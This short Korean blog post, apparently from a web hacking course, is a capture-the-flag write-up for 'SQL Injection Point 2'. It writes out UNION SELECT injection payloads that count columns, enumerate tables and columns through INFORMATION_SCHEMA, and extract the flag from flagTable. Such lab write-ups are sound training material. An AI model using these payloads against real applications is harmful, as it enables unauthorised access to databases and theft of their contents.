SQL Injection Point 2
50
flag를 찾으세요!
화면을 찾던중 SQL Injection Point 1과 동일하게 게시판의 option_val에서 sqlInjection이 가능한 것을 확인.
union select 1,2,3,4...... 를 통해서 선행 select는 10개의 컬럼을 가지고 있다는 것을 확인
information_schema.tables 에서 infromation_schema가 아닌 테이블을 확인
union select TABLE_NAME,TABLE_SCHEMA,3,4,5,6,7,8,9,10 FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA != 'information_schema' #
결과 flagTable을 확인
해당 테이블의 컬럼이 어떤 것이 존재하는지 확인하기 위해 columns조회
union select TABLE_NAME,TABLE_SCHEMA,COLUMN_NAME,4,5,6,7,8,9,10 FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'flagTable' #
username union select 1,idx,flag,4,5,6,7,8,9,10 FROM flagTable #
flag 찾기 성공
'웹 해킹 코스 > 과제' 카테고리의 다른 글
| SQL Injection Point 4 (0) | 2023.12.20 |
|---|---|
| SQL Injection Point 3 (0) | 2023.12.20 |
| SQL Injection Point 1 (1) | 2023.12.18 |
| Blind SQL 자동화 (0) | 2023.12.14 |
| CTF Athentication Bypass(Login Bypass 4) (2) | 2023.12.03 |